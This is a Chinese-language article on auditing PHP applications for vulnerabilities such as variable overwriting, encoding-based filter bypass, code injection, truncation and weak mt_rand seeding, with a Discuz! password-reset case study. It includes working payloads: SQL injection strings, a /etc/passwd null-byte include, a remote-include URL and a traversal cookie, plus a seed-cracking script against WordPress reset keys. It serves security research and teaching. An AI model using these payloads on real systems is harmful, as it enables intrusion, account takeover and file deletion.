高级PHP应用程序漏洞审核技术

前言

PHP是一种被普遍使用的脚本语言，尤为适合于web开发。具备跨平台，容易学习，功能强大等特色，据统计全世界有超过34%的网站有php的应 用，包括Yahoo、sina、16三、sohu等大型门户网站。并且不少具名的web应用系统（包括bbs,blog,wiki,cms等等）都是使用 php开发的，Discuz、phpwind、phpbb、vbb、wordpress、boblog等等。随着web安全的热点升级，php应用程序的 代码安全问题也逐步兴盛起来，愈来愈多的安全人员投入到这个领域，愈来愈多的应用程序代码漏洞被披露。

针对这样一个情况，不少应用程序的官方都成立了安所有门，或者雇佣安全人员进行代码审计，所以出现了不少自动化商业化的代码审计工具。也就是这样的 形势致使了一个局面：大公司的产品安全系数大大的提升，那些很明显的漏洞基本灭绝了，那些你们都知道的审计技术都无用武之地了。

咱们面对不少工具以及大牛扫描过n遍的代码，有不少的安全人员有点悲观，而有的官方安全人员也很是的放心本身的代码，可是不要忘记了“没有绝对的安全”，咱们应该去寻找新的途径挖掘新的漏洞。本文就给介绍了一些非传统的技术经验和你们分享。

另外在这里特别说明一下本文里面不少漏洞都是来源于网络上牛人和朋友们的分享，在这里须要感谢他们 ：）

传统的代码审计技术

WEB应用程序漏洞查找基本上是围绕两个元素展开：变量与函数。也就是说一漏洞的利用必须把你提交的恶意代码经过变量通过n次变量转换传递，最终传递给目标函数执行，还记得MS那句经典的名言吗？“一切输入都是有害的”。

这句话只强调了变量输入，不少程序员把“输入”理解为只是gpc[$_GET,$_POST,$_COOKIE]，可是变量在传递过程产生了n多的变化。致使不少过滤只是个“纸老虎”！咱们换句话来描叙下代码安全：“一切进入函数的变量是有害的”。

PHP代码审计技术用的最多也是目前的主力方法：静态分析，主要也是经过查找容易致使安全漏洞的危险函数，经常使用的如grep，findstr等搜索 工具，不少自动化工具也是使用正则来搜索这些函数。下面列举一些经常使用的函数，也就是下文说的字典（暂略）。可是目前基本已有的字典很难找到漏洞，因此咱们 须要扩展咱们的字典，这些字典也是本文主要探讨的。

其余的方法有：经过修改PHP源代码来分析变量流程，或者hook危险的函数来实现对应用程序代码的审核，可是这些也依靠了咱们上面提到的字典。

PHP版本与应用代码审计

到目前为止，PHP主要有3个版本：php四、php五、php6，使用比例大体以下：

php4	68%	2000-2007，No security fixes after 2008/08，最终版本是php4.4.9
php5	32%	2004-present，Now at version 5.2.6（PHP 5.3 alpha1 released!）
php6		目前还在测试阶段，变化不少作了大量的修改，取消了不少安全选项如magic_quotes_gpc（这个不是今天讨论的范围）

因为php缺乏自动升级的机制，致使目前PHP版本并存，也致使不少存在漏洞没有被修补。这些有漏洞的函数也是咱们进行WEB应用程序代码审计的重点对象，也是咱们字典重要来源。

其余的因素与应用代码审计

不少代码审计者拿到代码就看，他们忽视了“安全是一个总体”，代码安全不少的其余因素有关系，好比上面咱们谈到的PHP版本的问题，比较重要的还有 操做系统类型（主要是两大阵营win/*nix），WEB服务端软件（主要是iis/apache两大类型）等因素。这是因为不一样的系统不一样的WEB SERVER有着不一样的安全特色或特性，下文有些部分会涉及。

因此咱们在作某个公司WEB应用代码审计时，应该了解他们使用的系统，WEB服务端软件，PHP版本等信息。

扩展咱们的字典

下面将详细介绍一些非传统PHP应用代码审计一些漏洞类型和利用技巧。

变量自己的key

说到变量的提交不少人只是看到了GET/POST/COOKIE等提交的变量的值，可是忘记了有的程序把变量自己的key也当变量提取给函数处理。

1. <?php
2. //key.php?aaaa'aaa=1&bb'b=2
3. //print_R($_GET);
4. foreach ($_GET AS $key => $value)
5. {
6. print $key."\n";
7. }
8. ?>

上面的代码就提取了变量自己的key显示出来，单纯对于上面的代码，若是咱们提交URL：

key.php?<script>alert(1);</script>=1&bbb=2

那么就致使一个xss的漏洞，扩展一下若是这个key提交给include()等函数或者sql查询呢？：）

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

变量覆盖

不少的漏洞查找者都知道extract()这个函数在指定参数为EXTR_OVERWRITE或者没有指定函数能够致使变量覆盖，可是还有不少其余状况致使变量覆盖的如：

遍历初始化变量

请看以下代码：

1. <?php
2. //var.php?a=fuck
3. $a='hi';
4. foreach($_GET as $key => $value) {
5. $$key = $value;
6. }
7. print $a;
8. ?>

不少的WEB应用都使用上面的方式（注意循环不必定是foreach），如Discuz!4.1的WAP部分的代码：

1. $chs = '';
2. if($_POST && $charset != 'utf-8') {
3. $chs = new Chinese('UTF-8', $charset);
4. foreach($_POST as $key => $value) {
5. $$key = $chs->Convert($value);
6. }
7. unset($chs);

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

parse_str()变量覆盖漏洞

1. //var.php?var=new
2. $var = 'init';
3. parse_str($_SERVER['QUERY_STRING']);
4. print $var;

该函数同样能够覆盖数组变量，上面的代码是经过$SERVER'QUERYSTRING'来提取变量的，对于指定了变量名的咱们能够经过注射“=”来实现覆盖其余的变量：

1. //var.php?var=1&a[1]=var1%3d222
2. $var1 = 'init';
3. parse_str($a[$_GET['var']]);
4. print $var1;

上面的代码经过提交$var来实现对$var1的覆盖。

漏洞审计策略（parse_str）

PHP版本要求：无 md5-b615dea1edf6b93dec7a7e623fe8570f

漏洞审计策略（mb_parse_str）

PHP版本要求：php4<4.4.7 php5<5.2.2 md5-993116e42a531d2a9696f09ff87a836d

importrequestvariables()变量覆盖漏洞

1. //var.php?_SERVER[REMOTE_ADDR]=10.1.1.1
2. echo 'GLOBALS '.(int)ini_get("register_globals")."n";
3. import_request_variables('GPC');
4. if ($_SERVER['REMOTE_ADDR'] != '10.1.1.1') die('Go away!');
5. echo 'Hello admin!';

漏洞审计策略（import_request_variables）

PHP版本要求：php4<4.4.1 php5<5.2.2 md5-16ecd2d1e750dd44df8702198bb34005

PHP5 Globals

从严格意义上来讲这个不能够算是PHP的漏洞，只能算是一个特性，测试代码：

1. <?
2. // register_globals =ON
3. //foo.php?GLOBALS[foobar]=HELLO
4. php echo $foobar;
5. ?>

可是不少的程序没有考虑到这点，请看以下代码：

1. //为了安全取消全局变量
2. //var.php?GLOBALS[a]=aaaa&b=111
3. if (ini_get('register_globals')) foreach($_REQUEST as $k=>$v) unset(${$k});
4. print $a;
5. print $_GET[b];

若是熟悉WEB2.0的攻击的同窗，很容易想到上面的代码咱们能够利用这个特性进行crsf攻击。

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

magicquotesgpc与代码安全

什么是magicquotesgpc

当打开时，全部的 '（单引号），"（双引号），\（反斜线）和 NULL 字符都会被自动加上一个反斜线进行转义。还有不少函数有相似的做用 如：addslashes()、mysqlescapestring()、mysqlrealescapestring()等，另外还有parsestr()后的变量也受magicquotesgpc的影响。目前大多数的主机都打开了这个选项，而且不少程序员也注意使用上面那些函数去过滤变量，这看上去很安全。不少漏洞查找者或者工具遇到些函数过滤后的变量直接就放弃，可是就在他们放弃的同时也放过不少致命的安全漏洞。 ：）

哪些地方没有魔术引号的保护

1) $_SERVER变量

PHP5的$SERVER变量缺乏magicquotes_gpc的保护，致使近年来X-Forwarded-For的漏洞猛暴，因此不少程序员考虑过滤X-Forwarded-For，可是其余的变量呢？

漏洞审计策略（$_SERVER变量）

PHP版本要求：无 md5-4719e19bf61ce5a6f1990d5f2933da5c

2) getenv()获得的变量（使用相似$_SERVER变量）

漏洞审计策略（$_SERVER变量）

PHP版本要求：无 md5-14827d95fcdd8129f3cd0db2aef588da

3) $HTTPRAWPOST_DATA与PHP输入、输出流

主要应用与soap/xmlrpc/webpublish功能里，请看以下代码：

1. if ( !isset( $HTTP_RAW_POST_DATA ) ) {
2. $HTTP_RAW_POST_DATA = file_get_contents( 'php://input' );
3. }
4. if ( isset($HTTP_RAW_POST_DATA) )
5. $HTTP_RAW_POST_DATA = trim($HTTP_RAW_POST_DATA);

漏洞审计策略（数据流）

PHP版本要求：无 md5-874b5384b6942c4ee6f84e7a5119faa5

4) 数据库操做容易忘记'的地方如：in()/limit/order by/group by

如Discuz!<5.0的pm.php：

1. if(is_array($msgtobuddys)) {
2. $msgto = array_merge($msgtobuddys, array($msgtoid));
3. ......
4. foreach($msgto as $uid) {
5. $uids .= $comma.$uid;
6. $comma = ',';
7. }
8. ......
9. $query = $db->query("SELECT m.username, mf.ignorepm FROM {$tablepre}members m
10. LEFT JOIN {$tablepre}memberfields mf USING(uid)
11. WHERE m.uid IN ($uids)");

漏洞审计策略

PHP版本要求：无 md5-9730da3b833abb10b92c9467e93bd99c

变量的编码与解码

一个WEB程序不少功能的实现都须要变量的编码解码，并且就在这一转一解的传递过程当中就悄悄的绕过你的过滤的安全防线。

这个类型的主要函数有：

1) stripslashes() 这个其实就是一个decode-addslashes()

2) 其余字符串转换函数：

base64_decode	对使用 MIME base64 编码的数据进行解码
base64_encode	使用 MIME base64 对数据进行编码
rawurldecode	对已编码的 URL 字符串进行解码
rawurlencode	按照[RFC 1738](http://tools.ietf.org/html/rfc1738)对URL进行编码
urldecode	解码已编码的 URL 字符串
urlencode	编码 URL 字符串
...	...

另一个 unserialize/serialize

3) 字符集函数（GKB,UTF7/8...）如iconv()/mbconvertencoding()等

目前不少漏洞挖掘者开始注意这一类型的漏洞了，如典型的urldecode：

$sql = "SELECT * FROM article WHERE articleid='".urldecode($_GET[id])."'";

当magicquotesgpc=on时，咱们提交?id=%2527，获得sql语句为：

SELECT * FROM article WHERE articleid='''

漏洞审计策略

PHP版本要求：无 md5-3637ab9cc92ae883c91f6c21e3f6dba4

二次攻击

详细见附录[1]

1)数据库出来的变量没有进行过滤

2)数据库的转义符号：

1. mysql/oracle转义符号一样是\（咱们提交'经过魔术引号变化为\'，当咱们update进入数据库时，经过转义变为'）
2. mssql的转义字符为'（因此咱们提交'经过魔术引号变化为\'，mssql会把它当为一个字符串直接处理，因此魔术引号对于mssql的注射没有任何意义）

从这里咱们能够思考获得一个结论：一切进入函数的变量都是有害的，另外利用二次攻击咱们能够实现一个webrootkit，把咱们的恶意构造直接放到数据库里。咱们应当把这样的代码当作一个vul？

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

魔术引号带来的新的安全问题

首先咱们看下魔术引号的处理机制：

[\-->\\,'-->\',"-->\",null-->\0]

这给咱们引进了一个很是有用的符号“\”，“\”符号不只仅是转义符号，在WIN系统下也是目录转跳的符号。这个特色可能致使php应用程序里产生很是有意思的漏洞：

1)获得原字符（',\,",null]）

1. $order_sn=substr($_GET['order_sn'], 1);
3. //提交 '
4. //魔术引号处理 \'
5. //substr '
7. $sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
8. " shipping_time, shipping_id, invoice_no, user_id ".
9. " FROM " . $ecs->table('order_info').
10. " WHERE order_sn = '$order_sn' LIMIT 1";

2)获得“\”字符

$ordersn=substr($GET['order_sn'], 0,1);

1. //提交 '
2. //魔术引号处理 \'
3. //substr \
5. $sql = "SELECT order_id, order_status, shipping_status, pay_status, ".
6. " shipping_time, shipping_id, invoice_no, user_id ".
7. " FROM " . $ecs->table('order_info').
8. " WHERE order_sn = '$order_sn' and order_tn='".$_GET['order_tn']."'";

提交内容：

?order_sn='&order_tn=%20and%201=1/*

执行的SQL语句为：

1. SELECT order_id, order_status, shipping_status, pay_status, shipping_time,
2. shipping_id, invoice_no, user_id FROM order_info WHERE order_sn = '\' and
3. order_tn=' and 1=1/*'

漏洞审计策略

PHP版本要求：无 md5-0ba2f0cfb75760bb29bc9c7344e943d3

变量key与魔术引号

咱们最在这一节的开头就提到了变量key，PHP的魔术引号对它有什么影响呢？

1. <?php
2. //key.php?aaaa'aaa=1&bb'b=2
3. //print_R($_GET);
4. foreach ($_GET AS $key => $value)
5. {
6. print $key."\n";
7. }
8. ?>

1)当magicquotesgpc = On时，在php5.24下测试显示：

1. aaaa\'aaa
2. bb\'b

从上面结果能够看出来，在设置了magicquotesgpc = On下，变量key受魔术引号影响。可是在php4和php<5.2.1的版本中，不处理数组第一维变量的key，测试代码以下：

1. <?php
2. //key.php?aaaa'aaa[bb']=1
3. print_R($_GET);
4. ?>

结果显示:

1. Array ( [aaaa'aaa] => Array ( [bb\'] => 1 ) )

数组第一维变量的key不受魔术引号的影响。

漏洞审计策略

PHP版本要求：php4和php<5.2.1 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

2)当magicquotesgpc = Off时，在php5.24下测试显示：

1. aaaa'aaa
2. bb'b

对于magicquotesgpc = Off时全部的变量都是不安全的，考虑到这个，不少程序都经过addslashes等函数来实现魔术引号对变量的过滤，示例代码以下：

1. <?php
2. //keyvul.php?aaa'aa=1'
3. //magic_quotes_gpc = Off
4. if (!get_magic_quotes_gpc())
5. {
6. $_GET = addslashes_array($_GET);
7. }
9. function addslashes_array($value)
10. {
11. return is_array($value) ? array_map('addslashes_array', $value) : addslashes($value);
12. }
13. print_R($_GET);
14. foreach ($_GET AS $key => $value)
15. {
16. print $key;
17. }
18. ?>

以上的代码看上去很完美，可是他这个代码里addslashes($value)只处理了变量的具体的值，可是没有处理变量自己的key，上面的代码显示结果以下：

1. Array
2. (
3. [aaa'aa] => 1\'
4. )
5. aaa'aa

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

代码注射

PHP中可能致使代码注射的函数

不少人都知道eval、preg_replace+/e能够执行代码，可是不知道php还有不少的函数能够执行代码如：

1. assert()
2. call_user_func()
3. call_user_func_array()
4. create_function()
5. 变量函数
6. ...

这里咱们看看最近出现的几个关于create_function()代码执行漏洞的代码：

1. <?php
2. //how to exp this code
3. $sort_by=$_GET['sort_by'];
4. $sorter='strnatcasecmp';
5. $databases=array('test','test');
6. $sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
7. ';
8. usort($databases, create_function('$a, $b', $sort_function));

漏洞审计策略

PHP版本要求：无 md5-0232e542bbb413c6eee26d4a4b697547

变量函数与双引号

对于单引号和双引号的区别，不少程序员深有体会，示例代码：

1. echo "$a\n";
2. echo '$a\n';

咱们再看以下代码：

1. //how to exp this code
2. if($globals['bbc_email']){
4. $text = preg_replace(
5. array("/\[email=(.*?)\](.*?)\[\/email\]/ies",
6. "/\[email\](.*?)\[\/email\]/ies"),
7. array('check_email("$1", "$2")',
8. 'check_email("$1", "$1")'), $text);

另外不少的应用程序都把变量用""存放在缓存文件或者config或者data文件里，这样很容易被人注射变量函数。

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

PHP自身函数漏洞及缺陷

PHP函数的溢出漏洞

你们还记得Stefan Esser大牛的Month of PHP Bugs（MOPB见附录2）项目么，其中比较有名的要算是unserialize()，代码以下：

unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data']);

在以往的PHP版本里，不少函数都曾经出现过溢出漏洞，因此咱们在审计应用程序漏洞的时候不要忘记了测试目标使用的PHP版本信息。

漏洞审计策略

PHP版本要求：对应fix的版本 md5-79c2cd2b05e4468ae477ea741f08d9fa

PHP函数的其余漏洞

Stefan Esser大牛发现的漏洞：unset()--ZendHashDelKeyOr_Index Vulnerability 好比phpwind早期的serarch.php里的代码：

1. unset($uids);
2. ......
3. $query=$db->query("SELECT uid FROM pw_members WHERE username LIKE '$pwuser'");
4. while($member=$db->fetch_array($query)){
5. $uids .= $member['uid'].',';
6. }
7. $uids ? $uids=substr($uids,0,-1) : $sqlwhere.=' AND 0 ';
8. ........
9. $query = $db->query("SELECT DISTINCT t.tid FROM $sqltable WHERE $sqlwhere $orderby $limit");

漏洞审计策略

PHP版本要求：php4<4.3 php5<5.14 md5-ad283522b4fbbd41440392a41edc3d75

session_destroy()删除文件漏洞

测试PHP版本：5.1.2 这个漏洞是几年前朋友saiy发现的，session_destroy()函数的功能是删除session文件，不少web应用程序的logout的功能 都直接调用这个函数删除session，可是这个函数在一些老的版本中缺乏过滤致使能够删除任意文件。测试代码以下：

1. <?php
2. //val.php
3. session_save_path('./');
4. session_start();
5. if($_GET['del']) {
6. session_unset();
7. session_destroy();
8. }else{
9. $_SESSION['hei']=1;
10. echo(session_id());
11. print_r($_SESSION);
12. }
13. ?>

当咱们提交构造cookie:PHPSESSID=/../1.php，至关于unlink('sess_/../1.php')这样就经过注射../转跳目录删除任意文件了。不少著名的程序某些版本都受影响如phpmyadmin，sablog，phpwind3等等。

漏洞审计策略

PHP版本要求：具体不详 md5-5cfddd64912ab1357091e5775f2ee5be

随机函数

1) rand() VS mt_rand()

1. <?php
2. //on windows
3. print mt_getrandmax(); //2147483647
4. print getrandmax();// 32767
5. ?>

能够看出rand()最大的随机数是32767，这个很容易被咱们暴力破解。

1. <?php
2. $a= md5(rand());
3. for($i=0;$i<=32767;$i++){
4. if(md5($i) ==$a ) {
5. print $i."-->ok!!<br>";exit;
6. }else { print $i."<br>";}
7. }
8. ?>

当咱们的程序使用rand处理session时，攻击者很容易暴力破解出你的session，可是对于mt_rand是很难单纯的暴力的。

漏洞审计策略

PHP版本要求：无 md5-ab6d55d013a366bf4c6e8583d6212014

2) mt_srand()/srand()-weak seeding（by Stefan Esser）

看php手册里的描述：

mt_srand (PHP 3 >= 3.0.6, PHP 4, PHP 5)

mt_srand -- 播下一个更好的随机数发生器种子。说明

void mt_srand ( int seed )

用 seed 来给随机数发生器播种。从 PHP 4.2.0 版开始，seed 参数变为可选项，当该项为空时，会被设为随时数。

例子 1. mt_srand() 范例

1. <?php
2. // seed with microseconds
3. function make_seed()
4. {
5. list($usec, $sec) = explode(' ', microtime());
6. return (float) $sec + ((float) $usec * 100000);
7. }
8. mt_srand(make_seed());
9. $randval = mt_rand();
10. ?>

注: 自 PHP 4.2.0 起，再也不须要用 srand() 或 mt_srand() 函数给随机数发生器播种，现已自动完成。

php从4.2.0开始实现了自动播种，可是为了兼容，后来使用相似于这样的代码播种：

mt_srand ((double) microtime() * 1000000)

可是使用(double)microtime()*1000000相似的代码seed是比较脆弱的：

0<(double) microtime()<1 ---> 0<(double) microtime()* 1000000<1000000

那么很容易暴力破解,测试代码以下：

1. <?php
2. /////////////////
3. //>php rand.php
4. //828682
5. //828682
6. ////////////////
7. ini_set("max_execution_time",0);
8. $time=(double) microtime()* 1000000;
9. print $time."\n";
10. mt_srand ($time);
12. $search_id = mt_rand();
13. $seed = search_seed($search_id);
14. print $seed;
15. function search_seed($rand_num) {
16. $max = 1000000;
17. for($seed=0;$seed<=$max;$seed++){
18. mt_srand($seed);
19. $key = mt_rand();
20. if($key==$rand_num) return $seed;
21. }
22. return false;
23. }
24. ?>

从上面的代码实现了对seed的破解，另外根据Stefan Esser的分析seed还根据进程变化而变化，换句话来讲同一个进程里的seed是相同的。 而后同一个seed每次mt_rand的值都是特定的。以下图：

1. seed-A
2. mt_rand-A-1
3. mt_rand-A-2
4. mt_rand-A-3
6. seed-B
7. mt_rand-B-1
8. mt_rand-B-2
9. mt_rand-B-3

对于seed-A里mtrand-1/2/3都是不相等的，可是值都是特定的，也就是说当seed-A等于seed-B，那么mtrand-A-1就等于mtrand-B-1…，这样咱们只要可以获得seed就能够获得每次mtrand的值了。

对于5.2.6>php>4.2.0直接使用默认播种的程序也是不安全的（不少的安全人员错误的觉得这样就是安全的），这个要分两种状况来分析：

• 第一种：'Cross Application Attacks'，这个思路在Stefan Esser文章里有提到，主要是利用其余程序定义的播种（如mt_srand ((double) microtime()* 1000000)），phpbb+wordpree组合就存在这样的危险.

• 第二种：5.2.6>php>4.2.0默认播种的算法也不是很强悍，这是Stefan Esser的文章里的描述：

• The Implementation

• • When mtrand() is seeded internally or by a call to mtsrand() PHP 4 and PHP 5 <= 5.2.0 force the lowest bit to 1. Therefore the strength of the seed is only 31 and not 32 bits. In PHP 5.2.1 and above the implementation of the Mersenne Twister was changed and the forced bit removed.

在32位系统上默认的播种的种子为最大值是2^32，这样咱们循环最多2^32次就能够破解seed。而在PHP 4和PHP 5 <= 5.2.0 的算法有个bug：奇数和偶数的播种是同样的（详见附录3）,测试代码以下：

1. <?php
2. mt_srand(4);
3. $a = mt_rand();
4. mt_srand(5);
5. $b = mt_rand();
6. print $a."\n".$b;
7. ?>

经过上面的代码发现$a==$b，因此咱们循环的次数为232/2=231次。咱们看以下代码：

1. <?php
2. //base on http://www.milw0rm.com/exploits/6421
3. //test on php 5.2.0
5. define('BUGGY', 1); //上面代码$a==$b时候定义BUGGY=1
7. $key = wp_generate_password(20, false);
8. echo $key."\n";
9. $seed = getseed($key);
10. print $seed."\n";
12. mt_srand($seed);
13. $pass = wp_generate_password(20, false);
14. echo $pass."\n";
16. function wp_generate_password($length = 12, $special_chars = true) {
17. $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
18. if ( $special_chars )
19. $chars .= '!@#$%^&*()';
21. $password = '';
22. for ( $i = 0; $i < $length; $i++ )
23. $password .= substr($chars, mt_rand(0, strlen($chars) - 1), 1);
24. return $password;
25. }
27. function getseed($resetkey) {
28. $max = pow(2,(32-BUGGY));
29. for($x=0;$x<=$max;$x++) {
30. $seed = BUGGY ? ($x << 1) + 1 : $x;
31. mt_srand($seed);
32. $testkey = wp_generate_password(20,false);
33. if($testkey==$resetkey) { echo "o\n"; return $seed; }
35. if(!($x % 10000)) echo $x / 10000;
36. }
37. echo "\n";
38. return false;
39. }
40. ?>

运行结果以下：

1. php5>php rand.php
2. M8pzpjwCrvVt3oobAaOr
3. 0123456789101112131415161718192021222324252627282930313233343536373839404142434
4. 445464748495051525354555657585960616263646566676869
5. 7071727374757677787980818283848586878889909192939495969798991001011021031041051
6. 061071081091101111121131141151161171181191201211221
7. 2312412512612712812913013113213313413513613713813914014114214314414514614714814
8. 915015115215315415515615715815916016116216316416516
9. 6167168169170171172173174175176177178179180181182183184185186187188189190191192
10. 193194195196197198199200201202203204205206207208209
11. 2102112122132142152162172182192202212222232242252262272282292302312322332342352
12. 362372382392402412422432442452462472482492502512522
13. ..............01062110622106231062410625106261062710628106291063010631106321063
14. 3o
15. 70693
16. pjwCrvVt3oobAaOr

当10634次时候咱们获得告终果。

当PHP版本到了5.2.1后，经过修改算法修补了奇数和偶数的播种相等的问题，这样也致使了php5.2.0先后致使同一个播种后的mt_rand()的值不同。好比：

1. <?php
2. mt_srand(42);
3. echo mt_rand();
4. //php<=5.20 1387371436
5. //php>5.20 1354439493
6. ?>

正是这个缘由，也要求了咱们的exp的运行环境：当目标>5.20时候，咱们exp运行的环境也要是>5.20的版本，反过来也是同样。

从上面的测试及分析来看，php<5.26无论有没有定义播种，mtrand处理的数据都是不安全的。在web应用里不少都使用mtrand来处理随机的session，好比密码找回功能等等，这样的后果就是被攻击者恶意利用直接修改密码。

不少著名的程序都产生了相似的漏洞如wordpress、phpbb、punbb等等。（在后面咱们将实际分析下国内著名的bbs程序Discuz!的mt_srand致使的漏洞）

漏洞审计策略

PHP版本要求：php4 php5<5.2.6 md5-e5f53bc4e451a67ad5c30ecea9547c87

特殊字符

其实“特殊字符”也没有特定的标准定义，主要是在一些code hacking发挥着特殊重做用的一类字符。下面就举几个例子：

截断

其中最有名的数你们都熟悉的null字符截断。

include截断

1. <?php
2. include $_GET['action'].".php";
3. ?>

提交"action=/etc/passwd%00"中的"%00"将截断后面的".php"，可是除了"%00"还有没有其余的字符能够实现截断 使用呢？确定有人想到了远程包含的url里问号“?”的做用，经过提交"action=http://www.hacksite.com/evil- code.txt?"这里“?”实现了“伪截断”：），好象这个看上去不是那么舒服那么咱们简单写个代码fuzz一下：

1. <?php
2. ////////////////////
3. ////var5.php代码:
4. ////include $_GET['action'].".php";
5. ////print strlen(realpath("./"))+strlen($_GET['action']);
6. ///////////////////
7. ini_set('max_execution_time', 0);
8. $str='';
9. for($i=0;$i<50000;$i++)
10. {
11. $str=$str."/";
13. $resp=file_get_contents('http://127.0.0.1/var/var5.php?action=1.txt'.$str);
14. //1.txt里的代码为print 'hi';
15. if (strpos($resp, 'hi') !== false){
16. print $i;
17. exit;
18. }
19. }
20. ?>

通过测试字符“.”、“ /”或者2个字符的组合，在必定的长度时将被截断，win系统和*nix的系统长度不同，当win下strlen(realpath(". /"))+strlen($_GET['action'])的长度大于256时被截断，对于*nix的长度是4 * 1024 = 4096。对于php.ini里设置远程文件关闭的时候就能够利用上面的技巧包含本地文件了。（此漏洞由cloie#ph4nt0m.org最早发现]）

数据截断

对于不少web应用文件在不少功能是不允许重复数据的，好比用户注册功能等。通常的应用程序对于提交注册的username和数据库里已有的 username对比是否是已经有重复数据，然而咱们能够经过“数据截断”等来饶过这些判断，数据库在处理时候产生截断致使插入重复数据。

1) Mysql SQL Column Truncation Vulnerabilities

这个漏洞又是大牛Stefan Esser发现的（Stefan Esser是个人偶像:)），这个是因为mysql的sqlmode设置为default的时候，即没有开启STRICTALL_TABLES选项时，MySQL对于插入超长的值只会提示warning，而不是error（若是是error就插入不成功），这样可能会致使一些截断问题。测试以下：

1. mysql> insert into truncated_test(`username`,`password`) values("admin","pass");
3. mysql> insert into truncated_test(`username`,`password`) values("admin x", "new_pass");
4. Query OK, 1 row affected, 1 warning (0.01 sec)
6. mysql> select * from truncated_test;
7. +----+------------+----------+
8. | id | username | password |
9. +----+------------+----------+
10. | 1 | admin | pass |
11. | 2 | admin | new_pass |
12. +----+------------+----------+
13. 2 rows in set (0.00 sec)

2) Mysql charset Truncation vulnerability

这个漏洞是80sec发现的，当mysql进行数据存储处理utf8等数据时对某些字符致使数据截断。测试以下：

1. mysql> insert into truncated_test(`username`,`password`) values(concat("admin",0xc1), "new_pass2");
2. Query OK, 1 row affected, 1 warning (0.00 sec)
4. mysql> select * from truncated_test;
5. +----+------------+----------+
6. | id | username | password |
7. +----+------------+----------+
8. | 1 | admin | pass |
9. | 2 | admin | new_pass |
10. | 3 | admin | new_pass2 |
11. +----+------------+----------+
12. 2 rows in set (0.00 sec)

不少的web应用程序没有考虑到这些问题，只是在数据存储前简单查询数据是否包含相同数据，以下代码：

1. $result = mysql_query("SELECT * from test_user where user='$user' ");
2. ....
3. if(@mysql_fetch_array($result, MYSQL_NUM)) {
4. die("already exist");
5. }

漏洞审计策略

PHP版本要求：无 md5-9f2f1d115a7b72c89ed0cc63ef8f6e45

文件操做里的特殊字符

文件操做里有不少特殊的字符，发挥特别的做用，不少web应用程序没有注意处理这些字符而致使安全问题。好比不少人都知道的windows系统文件 名对“空格”和“.”等的忽视，这个主要体如今上传文件或者写文件上，致使直接写webshell。另外对于windows系统对“...\”进行系统转 跳等等。 下面还给你们介绍一个很是有意思的问题：

1. //Is this code vul?
2. if( eregi(".php",$url) ){
3. die("ERR");
4. }
5. $fileurl=str_replace($webdb[www_url],"",$url);
6. .....
7. header('Content-Disposition: attachment; filename='.$filename);

不少人看出来了上面的代码的问题，程序首先禁止使用“.php”后缀。可是下面竟然接了个strreplace替换$webdbwwwurl为空，那么咱们提交“.p$webdbwww_urlhp”就能够饶过了。那么上面的代码杂fix呢？有人给出了以下代码：

1. $fileurl=str_replace($webdb[www_url],"",$url);
2. if( eregi(".php",$url) ){
3. die("ERR");
4. }

strreplace提到前面了，很完美的解决了strreplace代码的安全问题，可是问题不是那么简单，上面的代码在某些系统上同样能够突破。接下来咱们先看看下面的代码：

1. <?php
2. for($i=0;$i<255;$i++) {
3. $url = '1.ph'.chr($i);
4. $tmp = @file_get_contents($url);
5. if(!empty($tmp)) echo chr($i)."\r\n";
6. }
7. ?>

咱们在windows系统运行上面的代码获得以下字符* < > ? P p均可以打开目录下的1.php。

漏洞审计策略

PHP版本要求：无 md5-eab7bef0c1900e1e0fd6d8c2ef28d4ef

怎么进一步寻找新的字典

上面咱们列举不少的字典，可是不少都是已经公开过的漏洞或者方式，那么咱们怎么进一步找到新的字典或者利用方式呢？

• 分析和学习别人发现的漏洞或者exp，总结出漏洞类型及字典
• 经过学习php手册或者官方文档,挖掘出新的有危害的函数或者利用方式
• fuzz php的函数，找到新的有问题的函数（不必定非要溢出的），如上一章的4.6的部分不少均可以简单的fuzz脚本能够测试出来
• 分析php源代码，发现新的漏洞函数“特性”或者漏洞。（在上一节里介绍的那些“漏洞审计策略”里，都没有php源代码的分析，若是你要进一步找 到新的字典，能够在php源代码的基础上分析下成因，而后根据这个成因来分析寻找新的漏洞函数“特性”或者漏洞。）（咱们之后会陆续公布一些咱们对php 源代码的分析）
• 有条件或者机会和开发者学习，找到他们实现某些经常使用功能的代码的缺陷或者容易忽视的问题
• 你有什么要补充的吗？ ：）

DEMO

DEMO -- Discuz! Reset User Password 0day Vulnerability 分析 （Exp:http://sebug.net/vuldb/ssvid-17519）

PHP版本要求:php4 php5<5.2.6

系统要求: 无

审计策略:查找mt_srand/mt_rand

第一步 安装Discuz! 6.1后利用grep查找mt_srand获得：

1. heige@heige-desktop:~/dz6/upload$ grep -in 'mt_srand' -r ./ --colour -5
2. ./include/global.func.php-694- $GLOBALS['rewritecompatible'] && $name = rawurlencode($name);
3. ./include/global.func.php-695- return '<a href="tag-'.$name.'.html"'.stripslashes($extra).'>';
4. ./include/global.func.php-696-}
5. ./include/global.func.php-697-
6. ./include/global.func.php-698-function random($length, $numeric = 0) {
7. ./include/global.func.php:699: PHP_VERSION < '4.2.0' && mt_srand((double)microtime() * 1000000);
8. ./include/global.func.php-700- if($numeric) {
9. ./include/global.func.php-701- $hash = sprintf('%0'.$length.'d', mt_rand(0, pow(10, $length) - 1));
10. ./include/global.func.php-702- } else {
11. ./include/global.func.php-703- $hash = '';
12. ./include/global.func.php-704- $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
13. --
14. ./include/discuzcode.func.php-30-
15. ./include/discuzcode.func.php-31-if(!isset($_DCACHE['bbcodes']) || !is_array($_DCACHE['bbcodes']) || !is_array($_DCACHE['smilies'])) {
